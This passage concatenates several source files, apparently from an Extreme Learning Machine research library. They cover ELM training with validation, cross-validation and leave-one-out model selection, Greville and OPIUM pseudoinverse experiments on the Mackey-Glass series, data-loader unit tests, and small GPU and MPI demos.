    HH = H.T.dot(H)
    HT = H.T.dot(T)
    P = inv(HH)
    B = P.dot(HT)
    # direct solution using only the last N-j samples
    j = 10
    H0 = H[j:]
    T0 = T[j:]
    HH0 = H0.T.dot(H0)
    HT0 = H0.T.dot(T0)
    P0 = inv(HH0)
    B0 = P0.dot(HT0)
    # remove the first j samples from the full solution analytically:
    # P1 = inv(HH - H1'H1) via the Sherman-Morrison-Woodbury identity
    H1 = H[:j]
    T1 = T[:j]
    a = inv(np.eye(j) - H1.dot(P).dot(H1.T))
    P1 = P + P.dot(H1.T).dot(a).dot(H1).dot(P)
    B1 = B - P1.dot(H1.T).dot(T1) + P1.dot(H1.T).dot(H1).dot(B)
    d = norm(B0 - B1)
    # parenthesized print works in both Python 2 and Python 3
    # (was a Python-2-only `print` statement)
    print(d)
    return d
# Run the self-check and report completion.  The parenthesized print form
# is valid in both Python 2 and Python 3 (was a Python-2-only statement).
prepare()
print("Done")
<file_sep> # -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
from slfn import SLFN
from hpelm.modules import mrsr, mrsr2
from mss_v import train_v
from mss_cv import train_cv
from mss_loo import train_loo
class ELM(SLFN):
    """Interface for training Extreme Learning Machines.

    Inherits data checking, neuron management and projection from SLFN;
    adds training with optional model structure selection (validation set,
    cross-validation, leave-one-out) and neuron ranking (OP-ELM).
    """

    def train(self, X, T, *args, **kwargs):
        """Universal training interface for ELM model with model structure selection.

        :param X: input data matrix
        :param T: target data matrix

        Model structure selection (exclusive, choose one)
        :param "V": use validation set
        :param "CV": use cross-validation
        :param "LOO": use leave-one-out validation

        Additional parameters for model structure selection
        :param Xv: validation data X ("V")
        :param Tv: validation targets T ("V")
        :param k: number of splits ("CV")

        Ranking of hidden neurons
        :param "OP": use Optimal Pruning (OP-ELM)
        :param "kmax": maximum number of neurons (with "OP")

        System setup
        :param "classification"/"c": build ELM for classification
        :param "weighted classification"/"wc": build ELM with weights assigned to classes
        :param w: weights of classes for "wc"
        :param "multiclass"/"mc": build ELM for multiclass classification
        :param "adaptive"/"ad": build adaptive ELM for non-stationary model
        :param "batch": batch size for adaptive ELM (sliding window step size)
        """
        assert len(self.neurons) > 0, "Add neurons to ELM before training it"
        X, T = self._checkdata(X, T)
        args = [a.upper() for a in args]  # make all arguments upper case
        # kind of "enumerators", try to use only inside that script
        MODELSELECTION = None  # V / CV / MCCV / LOO / None
        ADAPTIVE = False  # batch / None
        # reset parameters
        self.ranking = None
        self.kmax_op = None
        self.classification = None  # c / wc / mc
        self.weights_wc = None  # weights for weighted classification
        # check exclusive parameters
        assert len(set(args).intersection(set(["V", "CV", "LOO"]))) <= 1, "Use only one of V / CV / LOO"
        assert len(set(args).intersection(set(["C", "WC", "MC"]))) <= 1, "Use only one of \
            C (classification) / MC (multiclass) / WC (weighted classification)"
        # parse parameters
        for a in args:
            if a == "V":  # validation set
                assert "Xv" in kwargs.keys(), "Provide validation dataset (Xv)"
                assert "Tv" in kwargs.keys(), "Provide validation targets (Tv)"
                Xv = kwargs['Xv']
                Tv = kwargs['Tv']
                Xv, Tv = self._checkdata(Xv, Tv)
                MODELSELECTION = "V"
            if a == "CV":
                assert "k" in kwargs.keys(), "Provide Cross-Validation number of splits (k)"
                k = kwargs['k']
                assert k >= 3, "Use at least k=3 splits for Cross-Validation"
                MODELSELECTION = "CV"
            if a == "LOO":
                MODELSELECTION = "LOO"
            if a == "OP":
                self.ranking = "OP"
                if "kmax" in kwargs.keys():
                    self.kmax_op = int(kwargs["kmax"])
            if a == "C":
                assert self.targets > 1, "Classification targets must have 1 output per class"
                self.classification = "c"
            if a == "WC":
                assert self.targets > 1, "Classification targets must have 1 output per class"
                assert "w" in kwargs.keys(), "Provide class weights for weighted classification"
                w = kwargs['w']
                assert len(w) == T.shape[1], "Number of class weights differs from number of target classes"
                self.weights_wc = w
                self.classification = "wc"
            if a == "MC":
                assert self.targets > 1, "Classification targets must have 1 output per class"
                self.classification = "mc"
            # adaptive mode is currently disabled:
            # if a in ("A", "AD", "ADAPTIVE"):
            #     assert "batch" in kwargs.keys(), "Provide batch size for adaptive ELM model (batch)"
            #     batch = kwargs['batch']
            #     ADAPTIVE = True
        # use "train_x" method which borrows _project(), _error() from the "self" object
        if MODELSELECTION == "V":
            train_v(self, X, T, Xv, Tv)
        elif MODELSELECTION == "CV":
            train_cv(self, X, T, k)
        elif MODELSELECTION == "LOO":
            train_loo(self, X, T)
        else:
            self._train(X, T)

    def _train(self, X, T):
        """Most basic training algorithm for an ELM.
        """
        # _project returns (HH, HT, Beta) when solve=True; keep only Beta
        self.Beta = self._project(X, T, solve=True)[2]

    def _project(self, X, T, solve=False):
        """Create HH, HT matrices and computes solution Beta.

        An ELM-specific projection for all usage cases.
        Returns solution Beta if solve=True.
        Runs on GPU if self.accelerator="GPU".
        Performs balanced classification if self.classification="cb".
        """
        # initialize
        nn = sum([n1[1] for n1 in self.neurons])  # total number of hidden neurons
        batch = max(self.batch, nn)
        # number of batches; Python 2 integer division here
        if X.shape[0] % batch > 0:
            nb = X.shape[0]/batch + 1
        else:
            nb = X.shape[0]/batch

        # GPU script: accumulate H'H and H'T on the GPU via the magma solver
        def proj_gpu(self, X, T, getBeta, nn, nb):
            s = self.magma_solver.GPUSolver(nn, self.targets, self.alpha)
            for X0, T0 in zip(np.array_split(X, nb, axis=0),
                              np.array_split(T, nb, axis=0)):
                H0 = self.project(X0)
                s.add_data(H0, T0)
            HH, HT = s.get_corr()
            if getBeta:
                Beta = s.solve()
            else:
                Beta = None
            return HH, HT, Beta

        # CPU script: accumulate H'H and H'T batch by batch with numpy
        def proj_cpu(self, X, T, getBeta, nn, nb):
            HH = np.zeros((nn, nn))
            HT = np.zeros((nn, self.targets))
            HH.ravel()[::nn+1] += self.alpha  # add to matrix diagonal trick (L2 regularization)
            for X0, T0 in zip(np.array_split(X, nb, axis=0),
                              np.array_split(T, nb, axis=0)):
                H0 = self.project(X0)
                HH += np.dot(H0.T, H0)
                HT += np.dot(H0.T, T0)
            if getBeta:
                Beta = self._solve_corr(HH, HT)
            else:
                Beta = None
            return HH, HT, Beta

        # run scripts
        if self.classification == "cb":  # balanced classification wrapper
            ns = T.sum(axis=0).astype(np.float64)  # number of samples in classes
            wc = (ns / ns.sum())**-1  # weights of classes (inverse frequency)
            HH = np.zeros((nn, nn))  # init data holders
            HT = np.zeros((nn, self.targets))
            for i in range(wc.shape[0]):  # iterate over each particular class
                idxc = T[:, i] == 1
                Xc = X[idxc]
                Tc = T[idxc]
                if self.accelerator == "GPU":
                    HHc, HTc, _ = proj_gpu(self, Xc, Tc, False, nn, nb)
                else:
                    HHc, HTc, _ = proj_cpu(self, Xc, Tc, False, nn, nb)
                HH += HHc * wc[i]
                HT += HTc * wc[i]
            if solve:  # obtain solution
                Beta = self._solve_corr(HH, HT)
        else:
            if self.accelerator == "GPU":
                HH, HT, Beta = proj_gpu(self, X, T, solve, nn, nb)
            else:
                HH, HT, Beta = proj_cpu(self, X, T, solve, nn, nb)

        # return results
        if solve:
            return HH, HT, Beta
        else:
            return HH, HT

    def _error(self, Y, T, R=None):
        """Returns regression/classification/multiclass error, also for PRESS.

        An ELM-specific error with PRESS support; when R is given the error
        is the PRESS (leave-one-out) form with residuals scaled by R.
        """
        if R is None:  # normal classification error
            if self.classification == "c":
                err = np.mean(Y.argmax(1) != T.argmax(1))
            elif self.classification == "wc":  # weighted classification
                c = T.shape[1]
                errc = np.zeros(c)
                for i in xrange(c):  # per-class error
                    idx = np.where(T[:, i] == 1)[0]
                    if len(idx) > 0:
                        errc[i] = np.mean(Y[idx].argmax(1) != i)
                err = np.mean(errc * self.weights_wc)
            elif self.classification == "mc":
                err = np.mean((Y > 0.5) != (T > 0.5))
            else:
                err = np.mean((Y - T)**2)
        else:  # LOO_PRESS error
            if self.classification == "c":
                err = (Y.argmax(1) != T.argmax(1)).astype(np.float) / R.ravel()
                err = np.mean(err**2)
            elif self.classification == "wc":  # balanced classification
                c = T.shape[1]
                errc = np.zeros(c)
                for i in xrange(c):  # per-class MSE
                    idx = np.where(T[:, i] == 1)[0]
                    if len(idx) > 0:
                        t = (Y[idx].argmax(1) != i).astype(np.float) / R[idx].ravel()
                        errc[i] = np.mean(t**2)
                err = np.mean(errc * self.weights_wc)
            elif self.classification == "mc":
                err = ((Y > 0.5) != (T > 0.5)).astype(np.float) / R.reshape((-1, 1))
                err = np.mean(err**2)
            else:
                err = (Y - T) / R.reshape((-1, 1))
                err = np.mean(err**2)
        assert not np.isnan(err), "Error is NaN at %s" % self.classification
        return err

    def _ranking(self, nn, H=None, T=None):
        """Return ranking of hidden neurons; random or OP.
        """
        if self.ranking == "OP":
            if self.kmax_op is None:  # set maximum number of neurons
                self.kmax_op = nn
            else:  # or set a limited number of neurons
                nn = self.kmax_op
            if T.shape[1] < 10:  # fast mrsr for less outputs but O(2^t) in outputs
                rank = mrsr(H, T, self.kmax_op)
            else:  # slow mrsr for many outputs but O(t) in outputs
                rank = mrsr2(H, T, self.kmax_op)
        else:
            rank, nn = super(ELM, self)._ranking(nn)
        return rank, nn
<file_sep>#include <math.h>
/* Apply tanh() in place to selected columns of H.
 * H: n*k matrix in row-major order, modified in place.
 * f: length-k array of 0/1 flags; column j is transformed iff f[j] == 1.
 * Rows are independent, so the outer loop is parallelized with OpenMP. */
void mp_func(double *H, const int *f, int n, int k)
{
    int i, j, ofc;
    #pragma omp parallel for private(i, j, ofc)
    for (i=0; i<n; i++) {
        for (j=0; j<k; j++) {
            if (f[j] == 1) {
                ofc = i*k + j;  /* row-major offset of element (i, j) */
                H[ofc] = tanh(H[ofc]);
            }
        }
    }
}<file_sep>"""
Greville and OPIUM method for classifying Mackey-Glass from:
<NAME> and <NAME>,
"Learning the Pseudoinverse Solution to Network Weights"
Neural Networks
Used for Figure 3.
@author: andrevanschaik
"""
from pylab import *
from numpy import *
from OPIUM import *
# NOTE(review): this script uses Python-2-only `print` statements and
# star-imports from pylab/numpy/OPIUM (see file header).
# Simulation parameters
dt = 0.1  # time step
maxtime = 4000  # simulation stop time
alpha = 1.0  # learning rate for OPIUM
# generate Mackey-Glass series (discretized delay differential equation)
a = 0.2
b = 0.1
tau = 170  # delay of the Mackey-Glass equation
mg = ones(maxtime)
mg[0] = 0.000001
for t in range (tau,maxtime-1):
    mg[t+1] = mg[t]+((a*mg[t-tau])/(1+(pow(mg[t-tau],10)))-b*mg[t])
# Network parameters
numtaps = 4
taps = array((0,60,170,1000))  # delays used as network inputs
max_taps = 1000  # largest delay; training starts here
fanout = 10
forward = 50  # prediction horizon (samples ahead)
size_hidden = numtaps*fanout  # size of hidden layer
random_weights = random.rand(size_hidden,numtaps)-0.5  # input->hidden weights
# Greville Method
# Initialisation of matrices
M = zeros((1,size_hidden))  # hidden->output weights
x = zeros((numtaps,1))  # current inputs to the network
h = zeros((size_hidden,1))  # hidden layer output
E = zeros(maxtime)  # error matrix for plotting vs time
Y = zeros((1,maxtime))  # network output vs time
P = eye(size_hidden) / size_hidden  # initialise correlation matrix inverse
for t in range(max_taps,maxtime-forward):
    x = reshape(mg[t-taps],(numtaps,1))  # input vector
    h = tanh(dot(random_weights,x))  # hidden layer activation with sigmoid
    y = dot(M,h)  # output value
    Y[0,t+forward] = y  # output is saved as the predicted sample
    E[t+forward] = mg[t+forward]-y  # calculate error
    Greville(h,E[t+forward],M,P)  # basic Greville method; updates M and P in place
# end for t
# Calculate RMS error for the last 1000 points
error_G = sqrt(mean((Y[0,maxtime-1000:maxtime]-mg[maxtime-1000:maxtime])**2))
print error_G
# Plot input, output, and error
ion()
figure(0)
plot(mg)
plot(Y[0],'r')
plot(E,'g')
savetxt('MG_Greville.txt',(mg, Y[0], E))
# OPIUM Method (same experiment, OPIUM update rule instead of Greville)
# Initialisation of signal matrices
M = zeros((1,size_hidden))  # hidden->output weights
x = zeros((numtaps,1))  # current inputs to the network
h = zeros((size_hidden,1))  # hidden layer output
E_O = zeros(maxtime)  # error matrix for plotting vs time
Y_O = zeros((1,maxtime))  # network output vs time
P = eye(size_hidden) / size_hidden  # initialise correlation matrix inverse
for t in range(max_taps,maxtime-forward):
    x = reshape(mg[t-taps],(numtaps,1))  # input vector
    h = tanh(dot(random_weights,x))  # hidden layer activation with sigmoid
    y = dot(M,h)  # output value
    Y_O[0,t+forward] = y  # output is saved as the predicted sample
    E_O[t+forward] = mg[t+forward]-y  # calculate error
    OPIUM(h,E_O[t+forward],M,P,alpha)  # OPIUM method
# end for t
# Calculate RMS error for the last 1000 points
error_O = sqrt(mean((Y_O[0,maxtime-1000:maxtime]-mg[maxtime-1000:maxtime])**2))
print error_O
# Plot input, output, and error
figure(1)
plot(mg)
plot(Y_O[0],'r')
plot(E_O,'g')
savetxt('MG_Opium.txt',(mg, Y_O[0], E_O))
<file_sep># -*- coding: utf-8 -*-
"""
Created on Wed Nov 5 18:42:11 2014
@author: akusok
"""
from unittest import TestCase
import numpy as np
import os
from modules import batchX, batchT, encode, decode, meanstdX, c_dictT
class TestDataLoader(TestCase):
    """Unit tests for the data-loading helpers in `modules`:
    batchX/batchT (batched iteration over inputs/targets), encode/decode
    (class-label one-hot conversion), meanstdX (normalization statistics)
    and c_dictT (class dictionary construction).
    """

    def test_OneDimensionalX_ReshapeAddBias(self):
        # a flat input list becomes a column plus an appended bias column of ones
        x1 = [1, 2, 3]
        x2 = np.array([[1, 1], [2, 1], [3, 1]])
        x1p = np.vstack(batchX(x1)[0])
        self.assertEquals(x2.shape, x1p.shape)
        self.assertTrue(np.allclose(x2, x1p))

    def test_OneDimensionalY_ReshapeY(self):
        # a flat target vector becomes a single column
        y1 = np.array([4, 5, 6])
        y2 = np.array([[4], [5], [6]])
        y1p = np.vstack(batchT(y1)[0])
        self.assertEqual(y2.shape, y1p.shape)
        self.assertTrue(np.allclose(y2, y1p))

    def test_Encoder1dim_CorrectEncoding(self):
        y = [1, 2, 2]
        cdict = {1: np.array([1, 0]), 2: np.array([0, 1])}
        y1 = encode(y, cdict)
        y2 = np.array([[1, 0], [0, 1], [0, 1]])
        self.assertTrue(np.allclose(y1, y2))

    def test_Encoder2dim_CorrectEncoding(self):
        y = np.array([[1], [2], [2]])
        cdict = {1: np.array([1, 0]), 2: np.array([0, 1])}
        y1 = encode(y, cdict)
        y2 = np.array([[1, 0], [0, 1], [0, 1]])
        self.assertTrue(np.allclose(y1, y2))

    def test_EncoderString_CorrectEncoding(self):
        y = ['cat', 'dog', 'dog']
        cdict = {'cat': np.array([1, 0]), 'dog': np.array([0, 1])}
        y1 = encode(y, cdict)
        y2 = np.array([[1, 0], [0, 1], [0, 1]])
        self.assertTrue(np.allclose(y1, y2))

    def test_Decoder1dim_CorrectDecoding(self):
        y = np.array([[1, 0], [0, 1], [0, 1]])
        cdict = {1: np.array([1, 0]), 2: np.array([0, 1])}
        y1 = decode(y, cdict)
        y2 = [1, 2, 2]
        np.testing.assert_array_almost_equal(y1, y2)

    def test_DecoderString_CorrectDecoding(self):
        y = np.array([[1, 0], [0, 1], [0, 1]])
        cdict = {'cat': np.array([1, 0]), 'dog': np.array([0, 1])}
        y1 = decode(y, cdict)
        y2 = ['cat', 'dog', 'dog']
        self.assertEqual(y1, y2)

    def test_ClassificationY_CreateTargets(self):
        # 3 distinct classes -> one-hot targets with 3 columns, rows sum to 1
        y = np.array([1, 1, 2, 3])
        cdict = c_dictT(y)
        y1 = np.vstack(batchT(y, c_dict=cdict)[0])
        self.assertTrue(y1.shape[0] == 4)
        self.assertTrue(y1.shape[1] == 3)
        self.assertTrue(np.all(y1.sum(1) == 1))

    def test_ClassificationStrings_CreateTargets(self):
        y = ['cat', 'cat', 'dog', 'mouse']
        cdict = c_dictT(y)
        y1 = np.vstack(batchT(y, c_dict=cdict)[0])
        self.assertTrue(y1.shape[0] == 4)
        self.assertTrue(y1.shape[1] == 3)
        self.assertTrue(np.all(y1.sum(1) == 1))

    def test_meanstdX_GetMeanStd(self):
        x = [[1, 2], [3, 4], [5, 6]]
        m, s = meanstdX(x)
        x1 = np.array(x)
        self.assertTrue(np.allclose(m, x1.mean(0)))
        self.assertTrue(np.allclose(s, x1.std(0)))

    def test_InputTextCSV_Loads(self):
        # whitespace-delimited and comma-delimited files load identically
        d = os.path.join(os.path.dirname(__file__), "../datasets/Unittest-Iris")
        fx1 = os.path.join(d, "iris_data.txt")
        fx2 = os.path.join(d, "iris_data_comma.txt")
        x1 = np.vstack(batchX(fx1)[0])
        x2 = np.vstack(batchX(fx2, delimiter=",")[0])
        self.assertTrue(np.allclose(x1, x2))

    def test_SetBatch_CorrectChunkSize(self):
        # batch=7 over 10 samples yields chunks of 7 and 3 (Python 2 iterator)
        x = np.random.rand(10)
        x1 = batchX(x, batch=7)[0]
        x2 = np.hstack((x.reshape(-1, 1), np.ones((10, 1))))
        self.assertTrue(np.allclose(x2[:7], x1.next()))
        self.assertTrue(np.allclose(x2[7:], x1.next()))

    def test_batchX_GetNumberOfInputs(self):
        x = [[1, 2], [3, 4], [5, 6]]
        _, inputs, _ = batchX(x)
        self.assertEqual(2, inputs)

    def test_batchT_GetNumberOfTargets(self):
        y = [[1, 2], [3, 4], [5, 6]]
        _, targets = batchT(y)
        self.assertEqual(2, targets)

    def test_batchT_NumberOfClassificationTargets(self):
        y = ['cat', 'cat', 'dog', 'mouse']
        cdict = c_dictT(y)
        _, ctargets = batchT(y, c_dict=cdict)
        self.assertEqual(3, ctargets)

    def test_BinaryFeatures_SkipNormalization(self):
        # binary columns keep mean 0 / std 1 so normalization leaves them intact
        x = [[0, 0, 5], [1, 1, 6], [1, -1, 7], [0, 0, 8]]
        x = np.array(x, dtype=np.float)
        meanX, stdX = meanstdX(x)
        self.assertEqual(meanX[0], 0)
        self.assertEqual(meanX[1], 0)
        self.assertNotEqual(meanX[2], 0)
        self.assertEqual(stdX[0], 1)
        self.assertEqual(stdX[1], 1)
        self.assertNotEqual(stdX[2], 1)
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Oct 6 18:19:18 2014
@author: akusok
"""
from sklearn import datasets
import numpy as np
from elm_naive import ELM_Naive
from mpi4py import MPI
def run_mpi():
    """MPI demo: rank 0 loads and standardizes the Iris dataset, then an ELM
    is trained and run; rank 0 prints the per-sample class difference.

    NOTE(review): `ELM` is not imported in this module (only `ELM_Naive` is),
    so this function raises NameError as written -- confirm intended import.
    Also uses Python-2-only `print` statements.
    """
    comm = MPI.COMM_WORLD
    rank = comm.Get_rank()
    size = comm.Get_size()  # number of MPI processes (not used below)
    if rank == 0:
        # only the root rank holds the data; others pass None
        iris = datasets.load_iris()
        X = iris.data
        Y = np.zeros((150,3))  # one-hot targets for the 3 Iris classes
        Y[:50,0] = 1
        Y[50:100,1] = 1
        Y[100:,2] = 1
        X = (X - np.mean(X,0)) / np.std(X,0)  # standardize features
    else:
        X = None
        Y = None
    elm = ELM(4,3)
    elm.add_neurons(10, np.tanh)
    print elm.bias
    elm.train(X, Y)
    Yh = elm.run(X)
    if rank == 0:
        # zeros mean a correct prediction
        print np.argmax(Yh,1) - iris.target
def run_naive():
    """Train a naive single-machine ELM (20 hidden neurons) on the Iris
    dataset and print its classification accuracy as a percentage."""
    iris = datasets.load_iris()
    X = iris.data
    Y = np.zeros((150,3))  # one-hot targets for the 3 Iris classes
    Y[:50,0] = 1
    Y[50:100,1] = 1
    Y[100:,2] = 1
    Yh = ELM_Naive(X, Y, 20, classification=True)
    acc = float(np.sum(Y.argmax(1) == Yh)) / Y.shape[0]
    print "%.1f%%" % (acc*100)
if __name__ == "__main__":
    # run the single-machine demo; the parenthesized print form works in
    # both Python 2 and Python 3 (was a Python-2-only statement)
    run_naive()
    print("Done!")
<file_sep># -*- coding: utf-8 -*-
"""
Created on Thu Jan 8 08:47:44 2015
@author: akusok
"""
import numpy
from numpy.linalg import norm
import reikna.cluda as cluda
from reikna.linalg import MatrixMul
import time
#@profile
def run():
    """Multiply two random 3000x3000 float32 matrices with reikna on an
    OpenCL device and print whether the relative error against numpy.dot
    is below 1e-6."""
    api = cluda.ocl_api()
    thread = api.Thread.create()
    size = 3000
    lhs_shape = (size, size)
    rhs_shape = (size, size)
    lhs = numpy.random.randn(*lhs_shape).astype(numpy.float32)
    rhs = numpy.random.randn(*rhs_shape).astype(numpy.float32)
    lhs_dev = thread.to_device(lhs)
    rhs_dev = thread.to_device(rhs)
    out_dev = thread.array((lhs_shape[0], rhs_shape[1]), dtype=numpy.float32)
    matmul = MatrixMul(lhs_dev, rhs_dev, out_arr=out_dev)
    matmul_compiled = matmul.compile(thread)
    matmul_compiled(out_dev, lhs_dev, rhs_dev)
    expected = numpy.dot(lhs, rhs)
    print(norm(out_dev.get() - expected) / norm(expected) < 1e-6)
run()<file_sep># -*- coding: utf-8 -*-
"""
COMPARED THE BUILT-IN SINGLE-VARIABLE OPTIMIZATION FUNCTION WITH MY OWN IMPLEMENTATION.
MY IMPLEMENTATION MAKES 50% MORE FUNCTION CALLS.
MY IMPLEMENTATION PERFORMS BETTER BECAUSE IT ALSO CHECKS THE MAXIMUM AND MINIMUM NUMBERS OF NEURONS, WHILE
THE BUILT-IN IMPLEMENTATION CHECKS ROUGHLY THE 10% AND 85% BORDERS AND DOES NOT CHECK OUTSIDE THEM IF THERE IS
A LOCAL MINIMUM INSIDE THAT REGION.
"""
import numpy as np
from numpy.linalg import pinv
from scipy.optimize import minimize_scalar, brenth
from slfn import SLFN
class ELM(SLFN):
    """Non-parallel Extreme Learning Machine.

    Experimental variant that compares scipy's bounded scalar minimization
    against a custom interval-halving search for selecting the number of
    hidden neurons on a validation set (see module docstring).
    """

    # inherited def _checkdata(self, X, T):
    # inherited def add_neurons(self, number, func, W=None, B=None):
    # inherited def project(self, X):
    # inherited def predict(self, X):
    # inherited def save(self, model):
    # inherited def load(self, model):

    def __init__(self, inputs, outputs):
        """Universal constructor of ELM model.

        :param inputs: dimensionality of input data
        :param outputs: dimensionality of target data
        """
        super(ELM, self).__init__(inputs, outputs)

    def train(self, X, T, *args, **kwargs):
        """Universal training interface for ELM model with model structure selection.

        :param X: input data matrix
        :param T: target data matrix

        Model structure selection (exclusive, choose one)
        :param "V": use validation set
        :param "CV": use cross-validation
        :param "LOO": use leave-one-out validation

        Additional parameters for model structure selection
        :param Xv: validation data X ("V")
        :param Tv: validation targets T ("V")
        :param k: number of splits ("CV")

        Ranking of hidden neurons
        :param "HQ": use Hannan-Quinn criterion
        :param "OP": use Optimal Pruning (OP-ELM)

        System setup
        :param "classification"/"c": build ELM for classification
        :param "multiclass"/"mc": build ELM for multiclass classification
        :param "adaptive"/"ad": build adaptive ELM for non-stationary model
        :param "batch": batch size for adaptive ELM (sliding window step size)
        """
        assert len(self.neurons) > 0, "Add neurons to ELM before training it"
        X, T = self._checkdata(X, T)
        args = [a.upper() for a in args]  # make all arguments upper case
        # kind of "enumerators", try to use only inside that script
        MODELSELECTION = None  # V / CV / MCCV / LOO / None
        NEURONRANKING = None  # HQ / OP / None
        CLASSIFICATION = None  # c / mc / None
        ADAPTIVE = False  # batch / None
        Xv = None
        Tv = None
        k = None
        batch = None
        # check exclusive parameters
        assert len(set(args).intersection(set(["V", "CV", "MCCV", "LOO"]))) <= 1, "Use only one of V / CV / MCCV / LOO"
        assert len(set(args).intersection(set(["HQ", "OP"]))) <= 1, "Use only one of HQ / OP"
        assert len(set(args).intersection(set(["C", "MC"]))) <= 1, "Use only one of classification / multiclass (c / mc)"
        # parse parameters
        for a in args:
            if a == "V":  # validation set
                assert "Xv" in kwargs.keys(), "Provide validation dataset (Xv)"
                assert "Tv" in kwargs.keys(), "Provide validation targets (Tv)"
                Xv = kwargs['Xv']
                Tv = kwargs['Tv']
                Xv, Tv = self._checkdata(Xv, Tv)
                MODELSELECTION = "V"
            if a == "CV":
                assert "k" in kwargs.keys(), "Provide Cross-Validation number of splits (k)"
                k = kwargs['k']
                MODELSELECTION = "CV"
            if a == "LOO":
                MODELSELECTION = "LOO"
            if a == "HQ":
                NEURONRANKING = "HQ"
            if a == "OP":
                NEURONRANKING = "OP"
            if a in ("C", "CL", "CLASSIFICATION"):
                CLASSIFICATION = "c"
            if a in ("MC", "MULTICLASS"):
                CLASSIFICATION = "mc"
            if a in ("A", "AD", "ADAPTIVE"):
                assert "batch" in kwargs.keys(), "Provide batch size for adaptive ELM model (batch)"
                batch = kwargs['batch']
                ADAPTIVE = True
        # only validation-set selection is implemented in this experiment
        if MODELSELECTION == "V":
            self._train_v(X, T, Xv, Tv)
        else:
            self.Beta = self._solve(self.project(X), T)

    def _project_corr(self, X, T):
        """Create correlation matrices of projected data and targets.

        :return: (HH, HT) where HH = H'H and HT = H'T for H = project(X)
        """
        H = self.project(X)
        HH = np.dot(H.T, H)
        HT = np.dot(H.T, T)
        return HH, HT

    def _solve(self, H, T):
        """Solve a linear system H * Beta = T via the pseudo-inverse.
        """
        P = pinv(H)
        Beta = np.dot(P, T)
        return Beta

    def _error(self, Y, T):
        """Return an error (MSE) for given predictions Y and targets T.

        Differs for classification and multiclass.
        """
        err = np.mean((Y - T)**2)
        return err

    def _prune(self, idx):
        """Leave only neurons with the given indexes.

        Indexes run over the concatenation of all neuron groups, so they are
        shifted down by each group's size while walking through the groups.
        """
        idx = list(idx)
        neurons = []
        for nold in self.neurons:
            k = nold[1]  # number of neurons in this group
            ix1 = [i for i in idx if i < k]  # index for current neuron type
            idx = [i-k for i in idx if i >= k]  # shift remaining indexes to next group
            func = nold[0]
            number = len(ix1)
            W = nold[2][:, ix1]
            bias = nold[3][ix1]
            neurons.append((func, number, W, bias))
        self.neurons = neurons

    def _train_v(self, X, T, Xv, Tv):
        """Select the number of hidden neurons on a validation set, comparing
        scipy's bounded minimization with a custom interval-halving search,
        then prune and re-train.  Produces diagnostic plots.
        """
        HH, HT = self._project_corr(X, T)
        Hv = self.project(Xv)
        nn = Hv.shape[1]
        errors = np.ones((nn,)) * -1  # -1 marks "not yet computed"
        rank = np.arange(nn)  # create ranking of neurons
        np.random.shuffle(rank)
        Beta = self._solve(HH, HT)
        Yv = np.dot(Hv, Beta)
        # small per-neuron penalty to prefer fewer neurons at equal error
        penalty = self._error(Yv, Tv)*0.01 / nn

        def error_v(k, errors, rank, HH, HT, Hv, Tv, penalty):
            # memoized validation error for the top-k ranked neurons
            if errors[k] == -1:
                rank1 = rank[:k]
                HH1 = HH[rank1, :][:, rank1]
                HT1 = HT[rank1, :]
                print k, HH1.shape, HT1.shape, k, len(rank)
                B = self._solve(HH1, HT1)
                Yv = np.dot(Hv[:, rank1], B)
                errors[k] = self._error(Yv, Tv) + k*penalty
            return errors[k]

        # this works really good! same result with less re-calculations
        result = minimize_scalar(error_v,
                                 bounds=(1, nn),
                                 args=(errors, rank, HH, HT, Hv, Tv, penalty),
                                 method="Bounded",
                                 tol=0.5)
        print result
        best_nn = rank[:result.x]

        from matplotlib import pyplot as plt
        plt.plot([i for i in range(nn) if errors[i]>0], [e for e in errors if e > 0], "*b")
        # exhaustive sweep for the reference curves (raw and penalized error)
        e2 = np.ones((nn,)) * -1
        e3 = np.ones((nn,)) * -1
        for k in xrange(1,nn):
            rank1 = rank[:k]
            HH1 = HH[rank1, :][:, rank1]
            HT1 = HT[rank1, :]
            B = self._solve(HH1, HT1)
            Yv = np.dot(Hv[:, rank1], B)
            errors[k] = self._error(Yv, Tv)
            e2[k] = self._error(Yv, Tv)
            e3[k] = e2[k] + k*penalty
        plt.plot(range(1,nn), e2[1:], '-k')
        plt.plot(range(1,nn), e3[1:], '-r')

        # MYOPT function
        # [A B C D E] interval points,
        # halve the interval each time
        # init part
        e = np.ones((nn,)) * -1  # error for all numbers of neurons
        er = np.ones((nn,)) * -1  # error for all numbers of neurons
        A = 1
        E = nn-1
        l = E - A
        B = A + l/4
        C = A + l/2
        D = A + 3*l/4
        while True:
            for idx in [A, B, C, D, E]:  # calculate errors at points
                if e[idx] == -1:
                    e[idx] = error_v(idx, er, rank, HH, HT, Hv, Tv, penalty)
            m = min(e[A], e[B], e[C], e[D], e[E])  # find minimum element
            if m in (e[A], e[B]):  # halve the search interval
                E = C
                C = B
            elif m in (e[D], e[E]):
                A = C
                C = D
            else:
                A = B
                E = D
            l = E - A
            B = A + l/4
            D = A + (3*l)/4
            # minimum is found
            if l < 3:
                break
        k_opt = [k for k in [A, B, C, D, E] if e[k] == m][0]  # find minimum index
        best_nn = rank[:k_opt]
        plt.plot([i for i in range(nn) if e[i]>0], [e1 for e1 in e if e1 > 0], "dm")

        # keep only the selected neurons and re-train on all data
        self._prune(best_nn)
        self.Beta = self._solve(self.project(X), T)
        print "%d of %d neurons selected with a validation set" % (len(best_nn), nn)
        if len(best_nn) > nn*0.9:
            print "Hint: try re-training with more hidden neurons"
        plt.show()
<file_sep># -*- coding: utf-8 -*-
"""Multiresponse Sparse Regression algorithm in Python
Uses np library from Python
| Input:
| **T** is an (n x p) matrix of targets. The columns of T should
have zero mean and same scale (e.g. equal variance).
| **X** is an (n x m) matrix of regressors. The columns of X should
have zero mean and same scale (e.g. equal variance).
| **kmax** is an integer fixing the number of steps to be run, which
equals to the maximum number of regressors in the model.
| Output:
| **W** is an (m x p*kmax) sparse matrix of regression
coefficients. It can be converted to full matrix by command
full(W). Regression coefficients of the k:th step are given
by W(:,(k-1)*p+1:k*p).
| **i1** is a (1 x kmax) vector of indices revealing the order in
which the regressors enter model.
The estimates for T may be obtained by Y = X*W, where the k:th
estimate Y(:,(k-1)*p+1:k*p) uses k regressors.
| Reference:
| <NAME>, <NAME>. Multiresponse sparse regression with
application to multidimensional scaling. International Conference
on Artificial Neural Networks (ICANN). Warsaw, Poland. September
11-15, 2005. LNCS 3697, pp. 97-102.
Copyright (C) 2005 by <NAME> and <NAME>.
